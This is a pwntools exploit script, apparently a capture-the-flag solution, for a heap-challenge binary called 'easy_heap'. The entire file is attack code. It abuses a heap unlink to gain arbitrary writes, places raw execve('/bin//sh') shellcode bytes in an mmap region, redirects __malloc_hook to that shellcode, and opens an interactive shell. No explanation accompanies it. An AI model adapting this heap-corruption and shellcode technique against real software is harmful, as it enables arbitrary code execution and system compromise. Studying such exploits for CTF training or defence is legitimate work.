1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
| from pwn import *
context.log_level = "debug"
lib = ELF("libc.so.6")
sh = process("./easy_heap")
elf = ELF("easy_heap")
def add(size,ret):
sh.recvuntil(">> ")
sh.sendline("1")
sh.recvuntil("Size: ")
sh.sendline(str(size))
if(ret == 0):
return 0
else:
sh.recvuntil("Address 0x")
return int(sh.recv(12),16)
def edit(idx,content):
sh.recvuntil(">> ")
sh.sendline("3")
sh.recvuntil("Index: ")
sh.sendline(str(idx))
sh.recvuntil("Content: ")
sh.sendline(content)
def delete(idx):
sh.recvuntil(">> ")
sh.sendline("2")
sh.recvuntil("Index: ")
sh.sendline(str(idx))
if __name__ == "__main__":
sh.recvuntil("Mmap: 0x")
Mmap = int(sh.recv(10),16)
chunk_list_head = 0x0000000000202068
unlink_id = 3
fastbin = add(0x10,1)
unsort_bin_1= add(0x80,1)
unsort_bin_2= add(0x80,1)
chunk0 = add(0xf8,1)
chunk1 = add(0xf8,1)
chunk2 = add(0xf8,1)
#----unlink
payload = p64(0x110) + p64(0xf1) + p64(chunk0 - 0x18) + p64(chunk0 - 0x10)
payload = payload.ljust(0xf0,"a")
payload += p64(0xf0)
edit(unlink_id,payload)
delete(unlink_id + 1)
chunk3 = add(0xf8,1)
base = chunk0 - chunk_list_head
##----fill Mmap with shellcode
payload = p64(0x500) + p64(Mmap) + p64(0xf8) + "\x60"#idx=2 can't free
edit(unlink_id,payload)
edit(unlink_id-1,"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05")
#-----fill __malloc_hook
payload = p64(0x500)+"\x38"
edit(unlink_id,payload)
delete(1)
edit(0,p64(fastbin+0x10))
add(0x80,1)
edit(3,p64(0)*4+p64(0x500)+"\x10")
edit(2,p64(Mmap))
input()
add(0x80,0)
log.success("chunk3 :" + hex(chunk3))
log.success("base :" + hex(base))
log.success("unsort_bin_1 :"+hex(unsort_bin_1))
log.success("Mmap :"+hex(Mmap))
#log.success("__malloc_hook :"+hex(__malloc_hook))
#gdb.attach(sh.pid)
sh.interactive()
|
